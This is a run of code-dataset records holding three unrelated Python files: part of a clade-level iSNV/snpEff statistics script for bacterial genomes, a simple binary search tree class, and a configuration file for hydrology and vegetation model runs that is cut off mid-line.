iSNV_SNP_tableRead(iSNV_SNP_table)\r\n\r\n\tFiltPosiDic = FiltEcoliPosi(FiltEcoliPosiF)\r\n\trepeatRegPosi = FiltRefRepeatRegions(RepeatMaskedGnm)\r\n\r\n\tprint(len(repeatRegPosi))\r\n\tprint(list(repeatRegPosi.keys())[0:10])\r\n\tprint(list(lsD.keys())[0:10])\r\n\tprint(\"hhhhh\")\r\n\tcladeSampDic = readInfo(InfoF,person)\r\n\tsampleSnpEffP = snpEffPath\r\n\t#print(person)\r\n\t#print(cladeSampDic)\r\n\tFiltSamps = [\"P1-S1\",\"P1-S2\",\"P1-S3\",\"P2-S1\",\"P5-S17\",\"P7-S3\"]\r\n\t\r\n\r\n\tfor clade in cladeSampDic:\r\n\t\t#print(clade)\r\n\t\tcladeSamples = cladeSampDic[clade]\r\n\t\t\r\n\t\tcladeSamps = []\r\n\t\tfor cladeSample in cladeSamples:\r\n\t\t\tfor lieSamp in lieD:\r\n\t\t\t\tif lieSamp != \"#Posi\" and lieSamp != \"snv/SNP\" and cladeSample == lieSamp:\r\n\t\t\t\t\tcladeSamps.append(lieSamp)\r\n\r\n\t\tcladeSamps.sort()\r\n\t\t#print(cladeSamps)\r\n\t\tsamp_FreqDic,sampNA_PosiDic = samp_Freq_Dic(cladeSamps,lieD,lsD)\r\n\t\tpersonNAPosi = Person_NA_Posi(cladeSamps,sampNA_PosiDic)\r\n\t\tpersonCommonPosi = Person_commonSNP_Posi(cladeSamps,samp_FreqDic,lsD)\r\n\r\n\t\tCladeSNV_snpeffGeneDic = {}\r\n\t\tCladeSNP_snpeffGeneDic = {}\r\n\t\tsnv_interNumDic = {}\r\n\t\tallEff_Stat_Dic = {}\r\n\t\tallFreqDic = {}\r\n\t\tPosiGeneDic ={}\r\n\r\n\t\tfor sample in cladeSamps:\r\n\t\t\tSampsnv_Lst,SampSNP_Lst = tongjiFREQ(sample,samp_FreqDic,personNAPosi,personCommonPosi,FiltPosiDic,repeatRegPosi)\t\t\r\n\t\t\t#print(Sampsnv_Lst[\"42319\"])\r\n\t\t\tCladeSNV_snpeffGeneDic,CladeSNP_snpeffGeneDic,snv_interNumDic,allEff_Stat_Dic,allFreqDic,PosiGeneDic = readSnpEffF(sample,sampleSnpEffP,Sampsnv_Lst,SampSNP_Lst,CladeSNV_snpeffGeneDic,CladeSNP_snpeffGeneDic,snv_interNumDic,allEff_Stat_Dic,allFreqDic,PosiGeneDic)\r\n\r\n\r\n\r\n\t\t#print(PosiGeneDic)\r\n\r\n\r\n##out SNV Eff Freq of each posi in each clade\r\n\t\tprint(\"out 
SNV Eff Freq\")\r\n\t\tHeader = \"\\t\".join([\"Sample\",\"posi\",\"Flag\",\"Freq\"])\r\n\t\toutlines = []\r\n\t\tfor sample in cladeSamps:\r\n\t\t\tfor Posi in allFreqDic[sample]:\r\n\t\t\t \tfor Eff_Flag in allFreqDic[sample][Posi]:\r\n\t\t\t \t\tif Eff_Flag != \"iSNV_nonCoding\":\r\n\t\t\t \t \t\tline = \"\\t\".join([sample,str(Posi),Eff_Flag,str(allFreqDic[sample][Posi][Eff_Flag])])\r\n\t\t\t \t \t\toutlines.append(line)\r\n\t\tout = \"\\n\".join(outlines)\r\n\r\n\r\n\t\tout_SNVFreq_F = out_P + \"/\" + clade + \".snv_\" + str(snv_MinFreq) + \"-\" + str(snv_MaxFreq) + \".Eff_Freq.txt\"\r\n\t\tif ( os.path.exists(out_SNVFreq_F)):\r\n\t\t\tos.remove(out_SNVFreq_F)\r\n\t\tout_SNP_F_O=open(out_SNVFreq_F,'a')\r\n\t\tout_SNP_F_O.write(Header + \"\\n\")\r\n\t\tout_SNP_F_O.write(out + \"\\n\")\r\n\t\tout_SNP_F_O.close()\t\r\n\r\n\r\n\r\n##out SNV Eff Freq of each gene in each clade\r\n\t\tGeneNumCount = {}\r\n\t\tfor sample in cladeSamps:\r\n\t\t\tfor Posi in allFreqDic[sample]:\r\n\t\t\t \tfor Eff_Flag in allFreqDic[sample][Posi]:\r\n\t\t\t \t\tif Eff_Flag != \"iSNV_nonCoding\":\r\n\t\t\t \t\t\tgeneID = PosiGeneDic[Posi]\r\n\t\t\t \t\t\tif geneID not in GeneNumCount :\r\n\t\t\t \t\t\t\tGeneNumCount[geneID] = 0\r\n\t\t\t \t\t\tGeneNumCount[geneID] += 1\r\n\t\t\t \t \t\t\r\n\r\n\r\n\t\tprint(\"out SNV Eff Freq\")\r\n\t\tHeader = \"\\t\".join([\"Gene\",\"posi\",\"Flag\",\"Freq\"])\r\n\t\toutlines = []\r\n\t\tfor sample in cladeSamps:\r\n\t\t\tfor Posi in allFreqDic[sample]:\r\n\t\t\t \tfor Eff_Flag in allFreqDic[sample][Posi]:\r\n\t\t\t \t\tif Eff_Flag != \"iSNV_nonCoding\" and GeneNumCount[PosiGeneDic[Posi]] >= 3*len(cladeSamps) :\r\n\t\t\t \t \t\tline = \"\\t\".join([PosiGeneDic[Posi],str(Posi),Eff_Flag,str(allFreqDic[sample][Posi][Eff_Flag])])\r\n\t\t\t \t \t\toutlines.append(line)\r\n\t\tout = \"\\n\".join(outlines)\r\n\r\n\r\n\t\tout_SNVFreq_F = out_P + \"/\" + clade + \".snv_\" + str(snv_MinFreq) + \"-\" + str(snv_MaxFreq) + \".gene.Eff_Freq.txt\"\r\n\t\tif ( os.path.exists(out_SNVFreq_F)):\r\n\t\t\tos.remove(out_SNVFreq_F)\r\n\t\tout_SNP_F_O=open(out_SNVFreq_F,'a')\r\n\t\tout_SNP_F_O.write(Header + \"\\n\")\r\n\t\tout_SNP_F_O.write(out + \"\\n\")\r\n\t\tout_SNP_F_O.close()\t\r\n\r\n\r\n\r\n\r\n\r\n### out\r\n\t\t##person SNV snpeff Gene Stat\r\n\t\tPersonSNV_geneLst = []\r\n\t\tfor sample in cladeSamps:\r\n\t\t\tfor Gene in CladeSNV_snpeffGeneDic[sample]:\r\n\t\t\t\t#if CladeSNV_snpeffGeneDic[sample][Gene] > 1 and Gene not in PersonSNV_geneLst:\r\n\t\t\t\tif Gene not in PersonSNV_geneLst:\r\n\t\t\t\t\tPersonSNV_geneLst.append(Gene)\r\n\r\n\t\tlinesLst = []\r\n\t\tfor Gene in PersonSNV_geneLst:\r\n\t\t\tlineLst = [Gene]\r\n\t\t\tallNum = 0\r\n\t\t\tfor sample in cladeSamps:\r\n\t\t\t\tif Gene in CladeSNV_snpeffGeneDic[sample]:\r\n\t\t\t\t\tNum = CladeSNV_snpeffGeneDic[sample][Gene]\r\n\t\t\t\telse:\r\n\t\t\t\t\tNum = 0\r\n\t\t\t\tallNum += Num\r\n\r\n\t\t\t\tlineLst.append(str(Num))\r\n\t\t\tlineLst.append(str(allNum))\r\n\t\t\tline = \"\\t\".join(lineLst)\r\n\t\t\tif int(allNum) >= int(3 * len(cladeSamps)):\r\n\t\t\t\tlinesLst.append(line)\r\n\r\n\t\tlines = \"\\n\".join(linesLst)\r\n\r\n\r\n\t\toutHeader = [\"gene\"]\r\n\t\tfor sample in cladeSamps:\r\n\t\t\toutHeader.append(sample)\r\n\t\toutHeader.append(\"SumNum\")\r\n\t\tHeader = \"\\t\".join(outHeader)\r\n\r\n\r\n\t\tout_SNV_F = out_P + \"/\" + clade + \".snv_\" + str(snv_MinFreq) + \"-\" + str(snv_MaxFreq) + \".snpEff_Stat.txt\"\r\n\t\tif ( 
os.path.exists(out_SNV_F)):\r\n\t\t\tos.remove(out_SNV_F)\r\n\t\tout_SNP_F_O=open(out_SNV_F,'a')\r\n\t\tout_SNP_F_O.write(Header + \"\\n\")\r\n\t\tout_SNP_F_O.write(lines + \"\\n\")\r\n\t\tout_SNP_F_O.close()\t\r\n\r\n##-----------\r\n\t\t##person SNV syn Stat\r\n\t\tEff_PersonSNV_geneLst = []\r\n\t\tfor sample in cladeSamps:\r\n\t\t\tfor Gene in allEff_Stat_Dic[sample]:\r\n\t\t\t\t#if allEff_Stat_Dic[sample][Gene] > 1 and Gene not in PersonSNV_geneLst:\r\n\t\t\t\tif Gene not in Eff_PersonSNV_geneLst:\r\n\t\t\t\t\tEff_PersonSNV_geneLst.append(Gene)\r\n\r\n\r\n\t\tlinesLst = []\r\n\t\tfor Gene in Eff_PersonSNV_geneLst:\r\n\t\t\tlineLst = [Gene]\r\n\t\t\tallNum = 0\r\n\t\t\tfor sample in cladeSamps:\r\n\t\t\t\tif Gene in allEff_Stat_Dic[sample] and \"SNV_syn\" in allEff_Stat_Dic[sample][Gene]:\r\n\t\t\t\t\tNum = allEff_Stat_Dic[sample][Gene][\"SNV_syn\"]\r\n\t\t\t\telse:\r\n\t\t\t\t\tNum = 0\r\n\t\t\t\tallNum += Num\r\n\r\n\t\t\t\tlineLst.append(str(Num))\r\n\t\t\tlineLst.append(str(allNum))\r\n\t\t\tline = \"\\t\".join(lineLst)\r\n\t\t\tif allNum >= 3 * len(cladeSamps):\r\n\t\t\t\tlinesLst.append(line)\r\n\r\n\r\n\t\tlines = \"\\n\".join(linesLst)\r\n\r\n\r\n\r\n\t\toutHeader = [\"gene\"]\r\n\t\tfor sample in cladeSamps:\r\n\t\t\toutHeader.append(sample)\r\n\t\toutHeader.append(\"SumNum\")\r\n\t\tHeader = \"\\t\".join(outHeader)\r\n\r\n\r\n\t\tout_SNV_F = out_P + \"/\" + clade + \".snv_\" + str(snv_MinFreq) + \"-\" + str(snv_MaxFreq) + \".snpEff_Stat.Syn.txt\"\r\n\t\tif ( os.path.exists(out_SNV_F)):\r\n\t\t\tos.remove(out_SNV_F)\r\n\t\tout_SNP_F_O=open(out_SNV_F,'a')\r\n\t\tout_SNP_F_O.write(Header + \"\\n\")\r\n\t\tout_SNP_F_O.write(lines + \"\\n\")\r\n\t\tout_SNP_F_O.close()\t\r\n\r\n\r\n\r\n\r\n######\r\n\t\t##person SNV Nonsyn Stat\r\n\r\n\t\tEff_PersonSNV_geneLst = []\r\n\t\tfor sample in cladeSamps:\r\n\t\t\tfor Gene in allEff_Stat_Dic[sample]:\r\n\t\t\t\t#if allEff_Stat_Dic[sample][Gene] > 1 and Gene not in PersonSNV_geneLst:\r\n\t\t\t\tif Gene not in Eff_PersonSNV_geneLst:\r\n\t\t\t\t\tEff_PersonSNV_geneLst.append(Gene)\r\n\r\n\r\n\t\tlinesLst = []\r\n\t\tfor Gene in Eff_PersonSNV_geneLst:\r\n\t\t\tlineLst = [Gene]\r\n\t\t\tallNum = 0\r\n\t\t\tfor sample in cladeSamps:\r\n\t\t\t\tif Gene in allEff_Stat_Dic[sample] and \"SNV_nonsyn\" in allEff_Stat_Dic[sample][Gene]:\r\n\t\t\t\t\tNum = allEff_Stat_Dic[sample][Gene][\"SNV_nonsyn\"]\r\n\t\t\t\telse:\r\n\t\t\t\t\tNum = 0\r\n\t\t\t\tallNum += Num\r\n\r\n\t\t\t\tlineLst.append(str(Num))\r\n\t\t\tlineLst.append(str(allNum))\r\n\t\t\tline = \"\\t\".join(lineLst)\r\n\t\t\tif allNum >= 3 * len(cladeSamps):\r\n\t\t\t\t\r\n\t\t\t\tlinesLst.append(line)\r\n\r\n\r\n\t\tlines = \"\\n\".join(linesLst)\r\n\r\n\r\n\r\n\t\toutHeader = [\"gene\"]\r\n\t\tfor sample in cladeSamps:\r\n\t\t\toutHeader.append(sample)\r\n\t\toutHeader.append(\"SumNum\")\r\n\t\tHeader = \"\\t\".join(outHeader)\r\n\r\n\r\n\t\tout_SNV_F = out_P + \"/\" + clade + \".snv_\" + str(snv_MinFreq) + \"-\" + str(snv_MaxFreq) + \".snpEff_Stat.NonSyn.txt\"\r\n\t\tif ( os.path.exists(out_SNV_F)):\r\n\t\t\tos.remove(out_SNV_F)\r\n\t\tout_SNP_F_O=open(out_SNV_F,'a')\r\n\t\tout_SNP_F_O.write(Header + \"\\n\")\r\n\t\tout_SNP_F_O.write(lines + \"\\n\")\r\n\t\tout_SNP_F_O.close()\t\r\n\r\n\t\tprint()\r\n\t\tprint()\r\n\r\n\r\n\r\n\r\n\r\n\r\n'''\r\n## snv Eff of each sample \r\n\t\tHeader = \"\\t\".join([\"Sample\",\"posi\",\"Flag\",\"Freq\"])\t\r\n\t\tfor sample in cladeSamps:\r\n\t\t\toutlines = []\r\n\t\t\t#print(sample)\r\n\t\t\tfor Posi in allFreqDic[sample]:\r\n\t\t\t \tfor Eff_Flag in 
allFreqDic[sample][Posi]:\r\n\t\t\t \t#for Eff_Flag in [\"iSNV_Miss\",\"iSNV_Syn\"]:\r\n\t\t\t \t\tif Eff_Flag != \"iSNV_nonCoding\":\r\n\t\t\t \t \t\tline = \"\\t\".join([sample,Posi,Eff_Flag,str(allFreqDic[sample][Posi][Eff_Flag])])\r\n\t\t\t \t \t\toutlines.append(line)\r\n\t\t\tout = \"\\n\".join(outlines)\r\n\r\n\t\t\t#print(sample.split(\"_BDM\")[0].split(\"BJ13-\")[1]+ \"hh\") \r\n\r\n\t\t\tout_SNVFreq_F = out_P + \"/\" + sample + \".snv_\" + str(snv_MinFreq) + \"-\" + str(snv_MaxFreq) + \".Eff_Freq.txt\"\r\n\t\t\tif ( os.path.exists(out_SNVFreq_F)):\r\n\t\t\t\tos.remove(out_SNVFreq_F)\r\n\t\t\tout_SNP_F_O=open(out_SNVFreq_F,'a')\r\n\t\t\tout_SNP_F_O.write(Header + \"\\n\")\r\n\t\t\tout_SNP_F_O.write(out + \"\\n\")\r\n\t\t\tout_SNP_F_O.close()\t\r\n'''\r\n\r\n\r\n\r\n'''\r\n##person SNP snpeff Stat of SNP\r\n\t\tPersonSNP_geneLst = []\r\n\t\tfor sample in cladeSamps:\r\n\t\t\tfor Gene in CladeSNP_snpeffGeneDic[sample]:\r\n\t\t\t\t#if CladeSNP_snpeffGeneDic[sample][Gene] > 1 and Gene not in PersonSNP_geneLst:\r\n\t\t\t\tif Gene not in PersonSNP_geneLst:\r\n\t\t\t\t\tPersonSNP_geneLst.append(Gene)\r\n\r\n\t\tlinesLst = []\r\n\t\tfor Gene in PersonSNP_geneLst:\r\n\t\t\tlineLst = [Gene]\r\n\t\t\tallNum = 0\r\n\t\t\tfor sample in cladeSamps:\r\n\t\t\t\tif Gene in CladeSNP_snpeffGeneDic[sample]:\r\n\t\t\t\t\tNum = CladeSNP_snpeffGeneDic[sample][Gene]\r\n\t\t\t\telse:\r\n\t\t\t\t\tNum = 0\r\n\t\t\t\tallNum += Num\r\n\t\t\t\tlineLst.append(str(Num))\r\n\t\t\tlineLst.append(str(allNum))\r\n\t\t\tline = \"\\t\".join(lineLst)\r\n\t\t\t\r\n\t\t\tlinesLst.append(line)\r\n\r\n\t\tlines = \"\\n\".join(linesLst)\r\n\r\n\t\tout_SNP_F = out_P + \"/\" + clade + \".SNP_Over-\" + str(snv_MaxFreq) + \".snpEff_Stat.txt\"\r\n\t\tif ( os.path.exists(out_SNP_F)):\r\n\t\t\tos.remove(out_SNP_F)\r\n\t\tout_SNP_F_O=open(out_SNP_F,'a')\r\n\t\tout_SNP_F_O.write(Header + \"\\n\")\r\n\t\tout_SNP_F_O.write(lines + \"\\n\")\r\n\t\tout_SNP_F_O.close()\t\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n###---------------intra and inter gene\r\n\t\t#print(snv_interNumDic)\r\n\r\n\t\tPersonSNV_geneLst = []\r\n\t\tHeader = \"\\t\".join([\"sample\",\"SNV_intraGeneNum\",\"SNV_interGeneNum\",\"SNP_intraGeneNum\",\"SNP_interGeneNum\",\"SNV_syn_Num\",\"SNV_Nonsyn_Num\",\"SNP_syn_Num\",\"SNP_Nonsyn_Num\"])\r\n\t\t\r\n\t\t#SNV_intraNumLst = []\r\n\t\t#SNV_interNumLst = []\r\n\t\toutlines = []\r\n\t\tfor sample in cladeSamps:\r\n\t\t\t#SNV_intraNumLst.append(snv_interNumDic[sample][0])\r\n\t\t\t#SNV_interNumLst.append(snv_interNumDic[sample][1])\r\n\r\n\t\t\tintra_inter_Line = [sample]\r\n\t\t\tfor NUM in snv_interNumDic[sample]:\r\n\t\t\t\tintra_inter_Line.append(str(NUM))\r\n\r\n\t\t\toutlines.append(\"\\t\".join(intra_inter_Line))\r\n\t\tout = \"\\n\".join(outlines)\r\n\r\n\r\n\t\tout_intra_inter_Gene_snvSNPStat_F = out_P + \"/\" + clade + \".snvSNP_\" + str(snv_MinFreq) + \".\" + str(snv_MaxFreq) + \".intra-inter.Gene.Stat.txt\"\r\n\t\tif ( os.path.exists(out_intra_inter_Gene_snvSNPStat_F)):\r\n\t\t\tos.remove(out_intra_inter_Gene_snvSNPStat_F)\r\n\t\tout_SNP_F_O=open(out_intra_inter_Gene_snvSNPStat_F,'a')\r\n\t\tout_SNP_F_O.write(Header + \"\\n\")\r\n\t\tout_SNP_F_O.write(out + \"\\n\")\r\n\t\tout_SNP_F_O.close()\t\r\n\r\n'''\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tusage = \"usage:python %prog [option]\"\r\n\tparser = OptionParser(usage=usage)\r\n\r\n\tparser.add_option(\"-i\",\"--iSNV_SNP_table\",\r\n\t\t\t\t\t dest = \"iSNV_SNP_table\",\r\n\t\t\t\t\t default = \"\",\r\n\t\t\t\t\t metavar = \"file\",\r\n\t\t\t\t\t help = \"iSNV 
table. [required]\")\r\n\tparser.add_option(\"-o\",\"--out_P\",\r\n\t\t\t\t\t dest = \"out_P\",\r\n\t\t\t\t\t default = \"\",\r\n\t\t\t\t\t metavar = \"path\",\r\n\t\t\t\t\t help = \"output stat file Path of snv Freq distribution. [required]\")\r\n\r\n\tparser.add_option(\"-f\",\"--InfoF\",\r\n\t\t\t\t\t dest = \"InfoF\",\r\n\t\t\t\t\t default = \"\",\r\n\t\t\t\t\t metavar = \"file\",\r\n\t\t\t\t\t help = \"Info File. [required]\")\r\n\r\n\tparser.add_option(\"-E\",\"--FiltEcoliPosiF\",\r\n\t\t\t\t\t dest = \"FiltEcoliPosiF\",\r\n\t\t\t\t\t default = \"\",\r\n\t\t\t\t\t metavar = \"file\",\r\n\t\t\t\t\t help = \"Filt Ecoli homo Posi file. [required]\")\r\n\tparser.add_option(\"-R\",\"--RepeatMaskedGnm\",\r\n\t\t\t\t\t dest = \"RepeatMaskedGnm\",\r\n\t\t\t\t\t default = \"\",\r\n\t\t\t\t\t metavar = \"file\",\r\n\t\t\t\t\t help = \"RepeatMasker marked Gnm. [required]\")\r\n\tparser.add_option(\"-e\",\"--snpEffPath\",\r\n\t\t\t\t\t dest = \"snpEffPath\",\r\n\t\t\t\t\t default = \"\",\r\n\t\t\t\t\t metavar = \"path\",\r\n\t\t\t\t\t help = \"snpEff file Path. [required]\")\r\n\r\n\tparser.add_option(\"-m\",\"--snv_MinFreq\",\r\n\t\t\t\t\t dest = \"snv_MinFreq\",\r\n\t\t\t\t\t default = \"0.1\",\r\n\t\t\t\t\t metavar = \"float\",\r\n\t\t\t\t\t help = \"min Freq of snv to calculate (0-100%). [required]\")\r\n\tparser.add_option(\"-M\",\"--snv_MaxFreq\",\r\n\t\t\t\t\t dest = \"snv_MaxFreq\",\r\n\t\t\t\t\t default = \"0.9\",\r\n\t\t\t\t\t metavar = \"float\",\r\n\t\t\t\t\t help = \"max Freq of snv to calculate (0-100%). [required]\")\r\n\r\n\t\r\n\t(options,args) = parser.parse_args()\r\n\tiSNV_SNP_table = os.path.abspath(options.iSNV_SNP_table)\r\n\tout_P\t\t = os.path.abspath(options.out_P)\r\n\tInfoF = os.path.abspath(options.InfoF)\r\n\tFiltEcoliPosiF = os.path.abspath(options.FiltEcoliPosiF)\r\n\tRepeatMaskedGnm = os.path.abspath(options.RepeatMaskedGnm)\r\n\tsnpEffPath = os.path.abspath(options.snpEffPath)\r\n\t\r\n\tsnv_MinFreq\t\t= float(options.snv_MinFreq)\r\n\tsnv_MaxFreq\t\t= float(options.snv_MaxFreq)\r\n\r\n\tif ( not os.path.exists(out_P)):\r\n\t\tos.mkdir(out_P)\r\n\r\n\r\n\tmain()\r\n\r\n\r\n\r\n\r\n","repo_name":"lhj920321/HP-microevolution","sub_path":"scripts/iSNV_calling/iSNVpy_iSNV_snpeff_clade.py","file_name":"iSNVpy_iSNV_snpeff_clade.py","file_ext":"py","file_size_in_byte":19912,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"72082406985","text":"from collections import deque\n\n\nclass Node:\n def __init__(self, data=None):\n self.data = data\n self.right_child = None\n self.left_child = None\n\n\nclass Tree:\n def __init__(self):\n self.root_node = None\n\n def find_min(self):\n current = self.root_node\n while current.left_child:\n data = current.data\n current = current.left_child\n return data\n\n def find_max(self):\n current = self.root_node\n while current.right_child:\n data = current.data\n current = current.right_child\n return data\n\n def insert(self, data):\n node = Node(data)\n if self.root_node is None:\n self.root_node = node\n else:\n current = self.root_node\n parent = None\n while True:\n parent = current\n if node.data < current.data:\n current = current.left_child\n if current is None:\n parent.left_child = node\n return\n else:\n current = current.right_child\n if current is None:\n parent.right_child = node\n return\n\n def get_node_with_parent(self, data):\n current = self.root_node\n parent = None\n if current is None:\n return (parent, current)\n\n while True:\n if current.data == 
data:\n return (parent, current)\n elif data < current.data:\n parent = current\n current = current.left_child\n else:\n parent = current\n current = current.right_child\n return (parent, current)\n\n def remove(self, data):\n parent, node = self.get_node_with_parent(data)\n\n if parent is None and node is None:\n return False\n\n children_count = 0\n if node.right_child and node.left_child:\n children_count = 2\n elif (node.left_child is None) and node.right_child is None:\n children_count = 0\n else:\n children_count = 1\n\n if children_count == 0:\n if parent:\n if parent.right_child is node:\n parent.right_child = None\n else:\n parent.left_child = None\n\n else:\n self.root_node = None\n elif children_count == 1:\n next_node = None\n if node.left_child:\n next_node = node.left_child\n else:\n next_node = node.right_child\n\n if parent:\n if parent.right_child is node:\n parent.right_child = next_node\n else:\n parent.left_child = next_node\n else:\n self.root_node = next_node\n else:\n parent_of_leftmost_node = node\n leftmost_node = node.right_child\n while leftmost_node.left_child:\n parent_of_leftmost_node = leftmost_node\n leftmost_node = leftmost_node.left_child\n node.data = leftmost_node.data\n if parent_of_leftmost_node.left_child == leftmost_node:\n parent_of_leftmost_node.left_child = leftmost_node.right_child\n else:\n parent_of_leftmost_node.right_child = leftmost_node.right_child\n\n def search(self, data):\n current = self.root_node\n while True:\n if current is None:\n return None\n if current.data == data:\n return data\n elif current.data > data:\n current = current.left_child\n else:\n current = current.right_child\n\n def breadth_first_traversal(self):\n list_of_nodes = []\n traversal_queue = deque([self.root_node])\n\n while len(traversal_queue) > 0:\n node = traversal_queue.popleft()\n list_of_nodes.append(node.data)\n if node.left_child:\n traversal_queue.append(node.left_child)\n if node.right_child:\n traversal_queue.append(node.right_child)\n return list_of_nodes\n\n\nt1 = Tree()\nt1.insert(50)\nt1.insert(60)\nt1.insert(80)\nt1.insert(30)\nt1.insert(20)\nprint(t1.breadth_first_traversal())\n","repo_name":"jatin14mehta/projects","sub_path":"tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8753821785","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 7 15:33:38 2022\r\n\r\n@author: TEJan\r\n\"\"\"\r\n\r\n\r\nimport pathlib\r\n\r\n## Time steps for hourly/weekly model runs\r\n# - TODO replace numberOfTimeSteps for number_of_timesteps_hourly\r\n# Define number of hourlyy time steps to run\r\nnumber_of_timesteps_hourly = 3000 # in hours AFRONDEN OP 100 TAL, ZODAT HET DEELBAAR IS DOOR WINDOWSIZE IN STATEVARIABLES \r\n# number_of_timesteps_hourly = 8760 # ~1y in hours\r\n\r\n#Step size between h-model runs\r\n#stepsizeSnapshots = 5200 mag er later uit\r\n\r\ncutoff = False\r\n\r\n#Loop over snapshots\r\nstepsInShift = 100\r\nstepsTotal = 100\r\n# For 1 h-model run as test, use number_of_timesteps_weekly \r\n\r\n\r\n# Define number of weekly time steps to run\r\nnumber_of_timesteps_weekly = 104000\r\n#number_of_timesteps_weekly = 5200 # in weeks\r\n# number_of_timesteps_weekly = 104000 # ~2000y in weeks\r\n\r\n## Rate of forcing (grazing)\r\n# Define the fraction of total time at which no grazing occurs at the beginning (baseline for initial state)\r\nrel_start_grazing = 1/16\r\n# rel_start_grazing = 0\r\n# Define the 
total increase in grazing rate\r\ntot_increase_grazing = 0.0003\r\n# Select whether grazing rate returns to the initial value after the halfway point\r\n# - note that this halfway point occurs on (1 - rel_start) * total time / 2\r\nreturn_ini_grazing = True\r\n\r\n## Number of Monte Carlo (MC) runs\r\n# Define the number of MC samples or particles, results of realizations are written to the folder(s) 1, 2, ...\r\nnrOfSamples = 1\r\n\r\n## Particle filtering\r\n# When True, a particle filtering run is done, usually False for first time users\r\nfiltering = False\r\n\r\n## Create realizations\r\n# Selects whether a single, given value is used for a number of parameters or whether a realization for that parameter\r\n# is drawn randomly. Usually False for first time users.\r\ncreateRealizations = False\r\n\r\n## Calculate upstream totals\r\n# Selects whether upstream totals are calculated (accuflux) in the subsurfacewateronelayer and interceptionuptomaxstore\r\n# modules. May be needed for some reports and possibly budget checks (if one needs these). For normal use, this is set\r\n# to False.\r\ncalculateUpstreamTotals = False\r\n\r\n\r\n\r\n\r\n\r\n##############\r\n\r\n# Parameters \r\n\r\n##############\r\n\r\n## Reporting of variables\r\n# Selects which set of variables are reported, either 'full' or 'filtering'. These are passed to the class of a\r\n# component where the variables that can be reported can be defined.\r\n# setOfVariablesToReport = 'full'\r\n# setOfVariablesToReport = 'filtering'\r\nsetOfVariablesToReport = 'None'\r\n\r\n# Option to call the methods that change the geomorphology in the weekly model, typically True\r\nchangeGeomorphology = True\r\n\r\n# Option to fix both the regolith and the vegetation in the weekly model, typically False\r\nfixedStates = False\r\n\r\n## Timesteps to report variables for both hourly and weekly\r\n\r\n# Saving map files which can be used for spatial EWS or hourly model\r\n\"Weekly only\" # TODO - Might be worthwhile to implement this into the hourly model\r\nmap_data = True\r\nmean_timeseries_data = True\r\ninterval_map_snapshots = 100\r\n\r\n# definition for components were all timesteps should be reported\r\ntimesteps_to_report_all_hourly = list(range(1, number_of_timesteps_hourly + 1, 1))\r\ntimesteps_to_report_all_weekly = list(range(interval_map_snapshots, number_of_timesteps_weekly + 1,\r\n interval_map_snapshots))\r\n# timeStepsToReportAll = list(range(1, number_of_timesteps_hourly + 1, 1))\r\n\r\n# Used for discharge (hourly model only)\r\ntimeStepsToReportRqs = list(range(20, number_of_timesteps_hourly + 1, 20))\r\n\r\n# definition for components were a subset of timesteps should be reported\r\ntimesteps_to_report_some_hourly = list(range(100, number_of_timesteps_hourly + 1, 100))\r\ntimesteps_to_report_some_weekly = list(range(100, number_of_timesteps_weekly + 1, interval_map_snapshots))\r\n# timeStepsToReportSome = list(range(100, number_of_timesteps_hourly + 1, 100))\r\n\r\n\r\n## State variables for which to calculate Early Warning Signals (both hourly & weekly)\r\n# - TODO change state_variables_for_ews to state_variables_for_ews_hourly\r\n# - TODO check the 'full' list in EWS_StateVariables.py\r\n#state_variables_for_ews_hourly = ['Gs']\r\nstate_variables_for_ews_hourly = 'full'\r\nstate_variables_for_ews_weekly = ['bioM', 'bioA', 'moiM', 'moiA', \"regA\"]\r\n# state_variables_for_ews_weekly = 'full'\r\n\r\n## Reporting for the model components (both hourly and weekly)\r\nif setOfVariablesToReport == 'full':\r\n 
interception_report_rasters = [\"Vo\", \"Vi\", \"Vgf\", \"Vms\", \"Vs\"]\r\n # reports of totals (Vot) only make sense if calculateUpstreamTotals is True\r\n infiltration_report_rasters_weekly = [\"Ii\", \"Is\", \"Iks\"]\r\n infiltration_report_rasters = [\"Ii\", \"Ij\", \"Is\", \"Iks\"] # TODO - might want to rename this to \"\"_hourly, as above\r\n runoff_report_rasters = [\"Rq\", \"Rqs\"]\r\n subsurface_report_rasters = [\"Gs\", \"Go\"] \r\n # reports of totals (Gxt, Got) only make sense if calculateUpstreamTotals is True\r\n shading_report_rasters = [\"Mfs\", \"Msc\", \"Msh\"]\r\n surfacestore_report_rasters = [\"Ss\", \"Sc\"]\r\n rainfalleventsfromgammadistribution_report_rasters = [\"Pf\"]\r\n exchange_report_rasters = [\"Xrc\"]\r\n soilwashMMF_report_rasters = [\"Wde\", \"Wdm\", \"Wfl\"]\r\n regolith_report_rasters = [\"Ast\"]\r\n bedrockweathering_report_rasters = [\"Cwe\"]\r\n evapotrans_report_rasters = [\"Ep\", \"Epc\"]\r\n evapotranspirationsimple_report_rasters = [\"Ep\", \"Ea\"]\r\n biomassmodifiedmay_report_rasters = [\"Xs\"]\r\n baselevel_report_rasters = [\"Ll\"]\r\n creep_report_rasters = [\"Ds\"]\r\n randomparameters_report_rasters = [\"RPic\", \"RPks\", \"RPrt\", \"RPsc\", \"RPmm\"]\r\nelif setOfVariablesToReport == 'filtering':\r\n interception_report_rasters = [\"Vs\", \"Vgf\"]\r\n # reports of totals (Vot) only make sense if calculateUpstreamTotals is True\r\n infiltration_report_rasters_weekly = []\r\n infiltration_report_rasters = []\r\n runoff_report_rasters = [\"Rq\"]\r\n subsurface_report_rasters = []\r\n # reports of totals (Gxt, Got) only make sense if calculateUpstreamTotals is True\r\n shading_report_rasters = []\r\n surfacestore_report_rasters = []\r\n rainfalleventsfromgammadistribution_report_rasters = []\r\n exchange_report_rasters = []\r\n soilwashMMF_report_rasters = []\r\n regolith_report_rasters = []\r\n bedrockweathering_report_rasters = []\r\n evapotrans_report_rasters = []\r\n evapotranspirationsimple_report_rasters = []\r\n biomassmodifiedmay_report_rasters = []\r\n baselevel_report_rasters = []\r\n creep_report_rasters = []\r\n randomparameters_report_rasters = []\r\nelif setOfVariablesToReport == 'None':\r\n interception_report_rasters = []\r\n # reports of totals (Vot) only make sense if 